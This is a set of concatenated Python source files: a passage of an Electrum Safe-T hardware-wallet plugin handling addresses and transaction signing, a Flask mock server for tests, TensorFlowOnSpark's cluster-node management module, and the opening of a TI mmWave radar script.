client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
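# --- Illustrative sketch (not part of the original plugin) ---
# Spells out the electrum txin-type -> Safe-T script-type mapping implemented
# by get_safet_input_script_type above. `plugin` is assumed to be an
# initialized SafeTPlugin, so plugin.types comes from safetlib.messages.
def _example_input_script_type_mapping(plugin):
    expected = {
        'p2wpkh': plugin.types.InputScriptType.SPENDWITNESS,
        'p2wpkh-p2sh': plugin.types.InputScriptType.SPENDP2SHWITNESS,
        'p2pkh': plugin.types.InputScriptType.SPENDADDRESS,
        'p2sh': plugin.types.InputScriptType.SPENDMULTISIG,
    }
    for txin_type, script_type in expected.items():
        assert plugin.get_safet_input_script_type(txin_type) == script_type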
|
mock_server.py
|
import logging
import os
from threading import Thread
from uuid import uuid4
from typing import List
from flask import Flask, jsonify, Response, request
import requests
LOGGER = logging.getLogger(__name__)
# based on https://gist.github.com/eruvanos/f6f62edb368a20aaa880e12976620db8
class MockServer:
def __init__(self, port=12345):
self.thread = Thread(target=self._run)
self.port = port
self.app = Flask(__name__)
self.url = "http://localhost:%s" % self.port
self.app.add_url_rule("/shutdown", view_func=self._shutdown_server)
def _shutdown_server(self):
request.environ['werkzeug.server.shutdown']()
return 'Server shutting down...'
def _run(self):
self.app.run(port=self.port)
def start(self):
self.thread.start()
def stop(self):
requests.get("http://localhost:%s/shutdown" % self.port)
self.thread.join()
def add_callback_response(
self, url: str, callback: callable, methods=('GET',)):
callback.__name__ = str(uuid4()) # change name of method to mitigate flask exception
self.app.add_url_rule(url, view_func=callback, methods=methods)
return os.path.join(self.url, url.lstrip('/'))
def add_multiple_callbacks_response(
self, url: str, callbacks: List[callable], methods=('GET',)):
callback_it = iter(callbacks)
def _callback():
next_callback = next(callback_it)
response = next_callback()
LOGGER.debug('responding with: %s (callback: %s)', response, next_callback)
return response
return self.add_callback_response(url, _callback, methods=methods)
def add_json_response(self, url, serializable, methods=('GET',)):
def _callback():
return jsonify(serializable)
return self.add_callback_response(url, _callback, methods=methods)
def add_response(self, url, body, methods=('GET',), **kwargs):
def _callback():
return Response(body, **kwargs)
return self.add_callback_response(url, _callback, methods=methods)
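# --- Illustrative sketch (not part of the original module) ---
# Minimal usage of MockServer: register a canned JSON payload, start the
# server, hit it with requests, then shut it down. The port and route are
# arbitrary examples, and shutdown assumes the werkzeug development-server
# hook used by _shutdown_server is still available.
def _example_mock_server_usage():
    server = MockServer(port=12346)
    url = server.add_json_response('/status', {'ok': True})
    server.start()
    try:
        print(requests.get(url).json())  # {'ok': True}
    finally:
        server.stop()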
|
TFSparkNode.py
|
# Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""This module provides low-level functions for managing the TensorFlowOnSpark cluster."""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import json
import logging
import multiprocessing
import os
import platform
import socket
import subprocess
import sys
import uuid
import time
import traceback
from threading import Thread
from . import TFManager
from . import TFNode
from . import compat
from . import gpu_info
from . import marker
from . import reservation
from . import util
logger = logging.getLogger(__name__)
class TFNodeContext:
"""Encapsulates unique metadata for a TensorFlowOnSpark node/executor and provides methods to interact with Spark and HDFS.
An instance of this object will be passed to the TensorFlow "main" function via the `ctx` argument.
To simplify the end-user API, this class now mirrors the functions of the TFNode module.
Args:
:executor_id: integer identifier for this executor, per ``nodeRDD = sc.parallelize(range(num_executors), num_executors).``
:job_name: TensorFlow job name (e.g. 'ps' or 'worker') of this TF node, per cluster_spec.
:task_index: integer rank per job_name, e.g. "worker:0", "worker:1", "ps:0".
:cluster_spec: dictionary for constructing a tf.train.ClusterSpec.
:defaultFS: string representation of default FileSystem, e.g. ``file://`` or ``hdfs://<namenode>:8020/``.
:working_dir: the current working directory for local filesystems, or YARN containers.
:mgr: TFManager instance for this Python worker.
"""
def __init__(self, executor_id=0, job_name='', task_index=0, cluster_spec={}, defaultFS='file://', working_dir='.', mgr=None):
self.worker_num = executor_id # for backwards-compatibility
self.executor_id = executor_id
self.job_name = job_name
self.task_index = task_index
self.cluster_spec = cluster_spec
self.num_workers = sum([len(v) for k, v in cluster_spec.items() if k == 'master' or k == 'chief' or k == 'worker'])
self.defaultFS = defaultFS
self.working_dir = working_dir
self.mgr = mgr
def absolute_path(self, path):
"""Convenience function to access ``TFNode.hdfs_path`` directly from this object instance."""
return TFNode.hdfs_path(self, path)
def start_cluster_server(self, num_gpus=1, rdma=False):
"""Convenience function to access ``TFNode.start_cluster_server`` directly from this object instance."""
return TFNode.start_cluster_server(self, num_gpus, rdma)
def export_saved_model(self, sess, export_dir, tag_set, signatures):
"""Convenience function to access ``TFNode.export_saved_model`` directly from this object instance."""
TFNode.export_saved_model(sess, export_dir, tag_set, signatures)
def get_data_feed(self, train_mode=True, qname_in='input', qname_out='output', input_mapping=None):
"""Convenience function to access ``TFNode.DataFeed`` directly from this object instance."""
return TFNode.DataFeed(self.mgr, train_mode, qname_in, qname_out, input_mapping)
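# Illustrative sketch (not part of this module): the user-provided TensorFlow "main"
# function receives (argv, ctx), where ctx is the TFNodeContext built by run() below.
# DataFeed.next_batch() is assumed to be provided by the TFNode module.
#
#     def main_fun(argv, ctx):
#         print("executor {0} running {1}:{2}".format(ctx.executor_id, ctx.job_name, ctx.task_index))
#         if ctx.job_name not in ('ps', 'evaluator'):
#             data_feed = ctx.get_data_feed(train_mode=True)
#             batch = data_feed.next_batch(32)   # one batch of records fed from Spark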
class TFSparkNode(object):
"""Low-level functions used by the high-level TFCluster APIs to manage cluster state.
**This class is not intended for end-users (see TFNode for end-user APIs)**.
For cluster management, this wraps the per-node cluster logic as Spark RDD mapPartitions functions, where the RDD is expected to be
a "nodeRDD" of the form: ``nodeRDD = sc.parallelize(range(num_executors), num_executors)``.
For data feeding, this wraps the feeding logic as Spark RDD mapPartitions functions on a standard "dataRDD".
This also manages a reference to the TFManager "singleton" per executor. Since Spark can spawn more than one python-worker
per executor, this will reconnect to the "singleton" instance as needed.
"""
mgr = None #: TFManager instance
cluster_id = None #: Unique ID for a given TensorFlowOnSpark cluster, used for invalidating state for new clusters.
def _get_manager(cluster_info, host, executor_id):
"""Returns this executor's "singleton" instance of the multiprocessing.Manager, reconnecting per python-worker if needed.
Args:
:cluster_info: cluster node reservations
:host: host IP address
:executor_id: unique id per executor (created during initial call to run())
Returns:
TFManager instance for this executor/python-worker
"""
for node in cluster_info:
if node['host'] == host and node['executor_id'] == executor_id:
addr = node['addr']
authkey = node['authkey']
TFSparkNode.mgr = TFManager.connect(addr, authkey)
break
if TFSparkNode.mgr is None:
msg = "No TFManager found on this node, please ensure that:\n" + \
"1. Spark num_executors matches TensorFlow cluster_size\n" + \
"2. Spark cores/tasks per executor is 1.\n" + \
"3. Spark dynamic allocation is disabled."
raise Exception(msg)
logger.info("Connected to TFSparkNode.mgr on {0}, executor={1}, state={2}".format(host, executor_id, str(TFSparkNode.mgr.get('state'))))
return TFSparkNode.mgr
def run(fn, tf_args, cluster_meta, tensorboard, log_dir, queues, background):
"""Wraps the user-provided TensorFlow main function in a Spark mapPartitions function.
Args:
:fn: TensorFlow "main" function provided by the user.
:tf_args: ``argparse`` args, or command line ``ARGV``. These will be passed to the ``fn``.
:cluster_meta: dictionary of cluster metadata (e.g. cluster_id, reservation.Server address, etc).
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
:queues: *INTERNAL_USE*
:background: boolean indicating if the TensorFlow "main" function should be run in a background process.
Returns:
A nodeRDD.mapPartitions() function.
"""
def _mapfn(iter):
import tensorflow as tf
from packaging import version
# Note: consuming the input iterator helps PySpark re-use this worker.
for i in iter:
executor_id = i
# check that there are enough available GPUs (if using tensorflow-gpu) before committing reservation on this node
if compat.is_gpu_available():
num_gpus = tf_args.num_gpus if 'num_gpus' in tf_args else 1
gpus_to_use = gpu_info.get_gpus(num_gpus)
# assign TF job/task based on provided cluster_spec template (or use default/null values)
job_name = 'default'
task_index = -1
cluster_id = cluster_meta['id']
cluster_template = cluster_meta['cluster_template']
for jobtype in cluster_template:
nodes = cluster_template[jobtype]
if executor_id in nodes:
job_name = jobtype
task_index = nodes.index(executor_id)
break
# get unique key (hostname, executor_id) for this executor
host = util.get_ip_address()
util.write_executor_id(executor_id)
port = 0
# check for existing TFManagers
if TFSparkNode.mgr is not None and str(TFSparkNode.mgr.get('state')) != "'stopped'":
if TFSparkNode.cluster_id == cluster_id:
# raise an exception to force Spark to retry this "reservation" task on another executor
raise Exception("TFManager already started on {0}, executor={1}, state={2}".format(host, executor_id, str(TFSparkNode.mgr.get("state"))))
else:
# old state, just continue with creating new manager
logger.warn("Ignoring old TFManager with cluster_id {0}, requested cluster_id {1}".format(TFSparkNode.cluster_id, cluster_id))
# start a TFManager and get a free port
# use a random uuid as the authkey
authkey = uuid.uuid4().bytes
addr = None
if job_name in ('ps', 'evaluator'):
# PS nodes must be remotely accessible in order to shutdown from Spark driver.
TFSparkNode.mgr = TFManager.start(authkey, ['control', 'error'], 'remote')
addr = (host, TFSparkNode.mgr.address[1])
else:
# worker nodes only need to be locally accessible within the executor for data feeding
TFSparkNode.mgr = TFManager.start(authkey, queues)
addr = TFSparkNode.mgr.address
# initialize mgr state
TFSparkNode.mgr.set('state', 'running')
TFSparkNode.cluster_id = cluster_id
# expand Hadoop classpath wildcards for JNI (Spark 2.x)
if 'HADOOP_PREFIX' in os.environ:
classpath = os.environ['CLASSPATH']
hadoop_path = os.path.join(os.environ['HADOOP_PREFIX'], 'bin', 'hadoop')
hadoop_classpath = subprocess.check_output([hadoop_path, 'classpath', '--glob']).decode()
logger.debug("CLASSPATH: {0}".format(hadoop_classpath))
os.environ['CLASSPATH'] = classpath + os.pathsep + hadoop_classpath
# start TensorBoard if requested, on 'worker:0' if available (for backwards-compatibility), otherwise on 'chief:0' or 'master:0'
job_names = sorted([k for k in cluster_template.keys() if k in ['chief', 'master', 'worker']])
tb_job_name = 'worker' if 'worker' in job_names else job_names[0]
tb_pid = 0
tb_port = 0
if tensorboard and job_name == tb_job_name and task_index == 0:
tb_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tb_sock.bind(('', 0))
tb_port = tb_sock.getsockname()[1]
tb_sock.close()
logdir = log_dir if log_dir else "tensorboard_%d" % executor_id
# search for tensorboard in python/bin, PATH, and PYTHONPATH
pypath = sys.executable
pydir = os.path.dirname(pypath)
sys_path = os.pathsep.join(sys.path)
search_path = os.pathsep.join([pydir, sys_path, os.environ.get('PATH', ''), os.environ.get('PYTHONPATH', '')])  # PATH/PYTHONPATH may be unset
tb_path = util.find_in_path(search_path, 'tensorboard') # executable in PATH
if not tb_path:
tb_path = util.find_in_path(search_path, 'tensorboard/main.py') # TF 1.3+
if not tb_path:
tb_path = util.find_in_path(search_path, 'tensorflow/tensorboard/__main__.py') # TF 1.2-
if not tb_path:
raise Exception("Unable to find 'tensorboard' in: {}".format(search_path))
# launch tensorboard
if version.parse(tf.__version__) >= version.parse('2.0.0'):
tb_proc = subprocess.Popen([pypath, tb_path, "--reload_multifile=True", "--logdir=%s" % logdir, "--port=%d" % tb_port], env=os.environ)
else:
tb_proc = subprocess.Popen([pypath, tb_path, "--logdir=%s" % logdir, "--port=%d" % tb_port], env=os.environ)
tb_pid = tb_proc.pid
# check server to see if this task is being retried (i.e. already reserved)
client = reservation.Client(cluster_meta['server_addr'])
cluster_info = client.get_reservations()
tmp_sock = None
node_meta = None
for node in cluster_info:
(nhost, nexec) = (node['host'], node['executor_id'])
if nhost == host and nexec == executor_id:
node_meta = node
port = node['port']
# if not already done, register everything we need to set up the cluster
if node_meta is None:
# first, find a free port for TF
tmp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tmp_sock.bind(('', port))
port = tmp_sock.getsockname()[1]
node_meta = {
'executor_id': executor_id,
'host': host,
'job_name': job_name,
'task_index': task_index,
'port': port,
'tb_pid': tb_pid,
'tb_port': tb_port,
'addr': addr,
'authkey': authkey
}
# register node metadata with server
logger.info("TFSparkNode.reserve: {0}".format(node_meta))
client.register(node_meta)
# wait for other nodes to finish reservations
cluster_info = client.await_reservations()
client.close()
# construct a TensorFlow clusterspec from cluster_info
sorted_cluster_info = sorted(cluster_info, key=lambda k: k['executor_id'])
cluster_spec = {}
last_executor_id = -1
for node in sorted_cluster_info:
if (node['executor_id'] == last_executor_id):
raise Exception("Duplicate worker/task in cluster_info")
last_executor_id = node['executor_id']
logger.info("node: {0}".format(node))
(njob, nhost, nport) = (node['job_name'], node['host'], node['port'])
hosts = [] if njob not in cluster_spec else cluster_spec[njob]
hosts.append("{0}:{1}".format(nhost, nport))
cluster_spec[njob] = hosts
# update TF_CONFIG if cluster spec has a 'master' node (i.e. tf.estimator)
if 'master' in cluster_spec or 'chief' in cluster_spec:
tf_config = json.dumps({
'cluster': cluster_spec,
'task': {'type': job_name, 'index': task_index},
'environment': 'cloud'
})
logger.info("export TF_CONFIG: {}".format(tf_config))
os.environ['TF_CONFIG'] = tf_config
# reserve GPU(s) again, just before launching TF process (in case situation has changed)
if compat.is_gpu_available():
# compute my index relative to other nodes on the same host (for GPU allocation)
my_addr = cluster_spec[job_name][task_index]
my_host = my_addr.split(':')[0]
flattened = [v for sublist in cluster_spec.values() for v in sublist]
local_peers = [p for p in flattened if p.startswith(my_host)]
my_index = local_peers.index(my_addr)
num_gpus = tf_args.num_gpus if 'num_gpus' in tf_args else 1
gpus_to_use = gpu_info.get_gpus(num_gpus, my_index)
gpu_str = "GPUs" if num_gpus > 1 else "GPU"
logger.debug("Requested {} {}, setting CUDA_VISIBLE_DEVICES={}".format(num_gpus, gpu_str, gpus_to_use))
os.environ['CUDA_VISIBLE_DEVICES'] = gpus_to_use
# create a context object to hold metadata for TF
ctx = TFNodeContext(executor_id, job_name, task_index, cluster_spec, cluster_meta['default_fs'], cluster_meta['working_dir'], TFSparkNode.mgr)
# release port reserved for TF as late as possible
if tmp_sock is not None:
tmp_sock.close()
# Background mode relies on reuse of the python worker in Spark.
if background:
# However, python worker reuse does not work on Windows, so we need to check
# whether the current script is running on Windows.
if os.name == 'nt' or platform.system() == 'Windows':
raise Exception("Background mode is not supported on Windows.")
# Check that the Spark config for python worker reuse is enabled.
if not os.environ.get("SPARK_REUSE_WORKER"):
raise Exception("Background mode relies reuse of python worker on Spark. This config 'spark.python.worker.reuse' is not enabled on Spark. Please enable it before using background.")
def wrapper_fn(args, context):
"""Wrapper function that sets the sys.argv of the executor."""
if isinstance(args, list):
sys.argv = args
fn(args, context)
def wrapper_fn_background(args, context):
"""Wrapper function that signals exceptions to foreground process."""
errq = TFSparkNode.mgr.get_queue('error')
try:
wrapper_fn(args, context)
except Exception:
errq.put(traceback.format_exc())
if job_name in ('ps', 'evaluator') or background:
# invoke the TensorFlow main function in a background thread
logger.info("Starting TensorFlow {0}:{1} as {2} on cluster node {3} on background process".format(
job_name, task_index, job_name, executor_id))
p = multiprocessing.Process(target=wrapper_fn_background, args=(tf_args, ctx))
if job_name in ('ps', 'evaluator'):
p.daemon = True
p.start()
# for ps and evaluator nodes, wait indefinitely in foreground thread for a "control" event (None == "stop")
if job_name in ('ps', 'evaluator'):
queue = TFSparkNode.mgr.get_queue('control')
equeue = TFSparkNode.mgr.get_queue('error')
done = False
while not done:
while (queue.empty() and equeue.empty()):
time.sleep(1)
if (not equeue.empty()):
e_str = equeue.get()
raise Exception("Exception in " + job_name + ":\n" + e_str)
msg = queue.get(block=True)
logger.info("Got msg: {0}".format(msg))
if msg is None:
logger.info("Terminating {}".format(job_name))
TFSparkNode.mgr.set('state', 'stopped')
done = True
queue.task_done()
else:
# otherwise, just run TF function in the main executor/worker thread
logger.info("Starting TensorFlow {0}:{1} on cluster node {2} on foreground thread".format(job_name, task_index, executor_id))
wrapper_fn(tf_args, ctx)
logger.info("Finished TensorFlow {0}:{1} on cluster node {2}".format(job_name, task_index, executor_id))
return _mapfn
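# Driver-side wiring sketch (assumption, mirroring the "nodeRDD" form described above):
#
#     nodeRDD = sc.parallelize(range(num_executors), num_executors)
#     nodeRDD.foreachPartition(TFSparkNode.run(main_fun, tf_args, cluster_meta,
#                                              tensorboard, log_dir, queues, background))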
def train(cluster_info, cluster_meta, feed_timeout=600, qname='input'):
"""Feeds Spark partitions into the shared multiprocessing.Queue.
Args:
:cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc)
:cluster_meta: dictionary of cluster metadata (e.g. cluster_id, reservation.Server address, etc)
:feed_timeout: number of seconds after which data feeding times out (600 sec default)
:qname: *INTERNAL_USE*
Returns:
A dataRDD.mapPartitions() function
"""
def _train(iter):
# get shared queue, reconnecting if necessary
mgr = _get_manager(cluster_info, util.get_ip_address(), util.read_executor_id())
try:
queue = mgr.get_queue(qname)
equeue = mgr.get_queue('error')
except (AttributeError, KeyError):
msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(qname)
raise Exception(msg)
state = str(mgr.get('state'))
logger.info("mgr.state={0}".format(state))
terminating = state == "'terminating'"
if terminating:
logger.info("mgr is terminating, skipping partition")
count = sum(1 for item in iter)
logger.info("Skipped {0} items from partition".format(count))
else:
logger.info("Feeding partition {0} into {1} queue {2}".format(iter, qname, queue))
count = 0
for item in iter:
count += 1
queue.put(item, block=True)
# wait for consumers to finish processing all items in queue before "finishing" this iterator
joinThr = Thread(target=queue.join)
joinThr.start()
timeout = feed_timeout
while (joinThr.isAlive()):
if (not equeue.empty()):
e_str = equeue.get()
raise Exception("Exception in worker:\n" + e_str)
time.sleep(1)
timeout -= 1
if timeout <= 0:
raise Exception("Timeout while feeding partition")
logger.info("Processed {0} items in partition".format(count))
# check if TF is terminating feed after this partition
if not terminating:
state = str(mgr.get('state'))
terminating = state == "'terminating'"
if terminating:
try:
logger.info("TFSparkNode: requesting stop")
client = reservation.Client(cluster_meta['server_addr'])
client.request_stop()
client.close()
except Exception as e:
# ignore any errors while requesting stop
logger.debug("Error while requesting stop: {0}".format(e))
return [terminating]
return _train
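# Driver-side feeding sketch (assumption): the returned function is applied to a data RDD, e.g.
#
#     dataRDD.mapPartitions(TFSparkNode.train(cluster_info, cluster_meta, qname='input')).collect()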
def inference(cluster_info, feed_timeout=600, qname='input'):
"""Feeds Spark partitions into the shared multiprocessing.Queue and returns inference results.
Args:
:cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc)
:feed_timeout: number of seconds after which data feeding times out (600 sec default)
:qname: *INTERNAL_USE*
Returns:
A dataRDD.mapPartitions() function
"""
def _inference(iter):
# get shared queue, reconnecting if necessary
mgr = _get_manager(cluster_info, util.get_ip_address(), util.read_executor_id())
try:
queue_in = mgr.get_queue(qname)
equeue = mgr.get_queue('error')
except (AttributeError, KeyError):
msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(qname)
raise Exception(msg)
logger.info("Feeding partition {0} into {1} queue {2}".format(iter, qname, queue_in))
count = 0
for item in iter:
count += 1
queue_in.put(item, block=True)
# signal "end of partition"
queue_in.put(marker.EndPartition())
# skip empty partitions
if count == 0:
return []
# wait for consumers to finish processing all items in queue before "finishing" this iterator
joinThr = Thread(target=queue_in.join)
joinThr.start()
timeout = feed_timeout
while (joinThr.isAlive()):
if (not equeue.empty()):
e_str = equeue.get()
raise Exception("Exception in worker:\n" + e_str)
time.sleep(1)
timeout -= 1
if timeout <= 0:
raise Exception("Timeout while feeding partition")
logger.info("Processed {0} items in partition".format(count))
# read result queue
results = []
queue_out = mgr.get_queue('output')
while count > 0:
result = queue_out.get(block=True)
results.append(result)
count -= 1
queue_out.task_done()
logger.info("Finished processing partition")
return results
return _inference
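# Driver-side sketch (assumption): inference returns the prediction results per partition, e.g.
#
#     predictions = dataRDD.mapPartitions(TFSparkNode.inference(cluster_info, qname='input')).collect()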
def shutdown(cluster_info, grace_secs=0, queues=['input']):
"""Stops all TensorFlow nodes by feeding ``None`` into the multiprocessing.Queues.
Args:
:cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc).
:queues: *INTERNAL_USE*
Returns:
A nodeRDD.mapPartitions() function
"""
def _shutdown(iter):
host = util.get_ip_address()
executor_id = util.read_executor_id()
# reconnect to shared queue
mgr = _get_manager(cluster_info, host, executor_id)
# send SIGTERM to Tensorboard proc (if running)
for node in cluster_info:
if node['host'] == host and node['executor_id'] == executor_id:
tb_pid = node['tb_pid']
if tb_pid != 0:
logger.info("Stopping tensorboard (pid={0})".format(tb_pid))
subprocess.Popen(["kill", str(tb_pid)])
# terminate any listening queues
logger.info("Stopping all queues")
for q in queues:
if q != 'error':
try:
queue = mgr.get_queue(q)
logger.info("Feeding None into {0} queue".format(q))
queue.put(None, block=True)
except (AttributeError, KeyError):
msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(q)
raise Exception(msg)
# wait for grace period (after terminating feed queues)
if grace_secs > 0:
logger.info("Waiting for {} second grace period".format(grace_secs))
time.sleep(grace_secs)
# then check for any late exceptions
equeue = mgr.get_queue('error')
if (not equeue.empty()):
# note: "peek" this queue, since otherwise Spark might retry this "failed" task, find no errors in queue, and finish the job with SUCCESS
e_str = equeue.get()
equeue.put(e_str)
raise Exception("Exception in worker:\n" + e_str)
logger.info("Setting mgr.state to 'stopped'")
mgr.set('state', 'stopped')
return [True]
return _shutdown
|
14_mmw.py
|
#
# Copyright (c) 2018, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
#
# TI IWR1443 ES2.0 EVM @ mmWave SDK demo of SDK 1.2.0.5
# TI IWR1443 ES3.0 EVM @ mmWave SDK demo of SDK 2.1.0.4
#
import sys
import json
import serial
import threading
from lib.shell import *
from lib.helper import *
from lib.utility import *
# ------------------------------------------------
_meta_ = {
'mss': 'MMW Demo',
'dev': ('xWR14xx',),
'ver': ('01.02.00.05', '02.01.00.04',),
'cli': 'mmwDemo:/>',
'seq': b'\x02\x01\x04\x03\x06\x05\x08\x07',
'blk': 32,
'aux': 921600,
'ant': (4, 3),
'app': {
'rangeProfile': ('plot_range_profile', 'capture_range_profile', 'monitor_activity', ),
'noiseProfile': ('plot_range_profile', ),
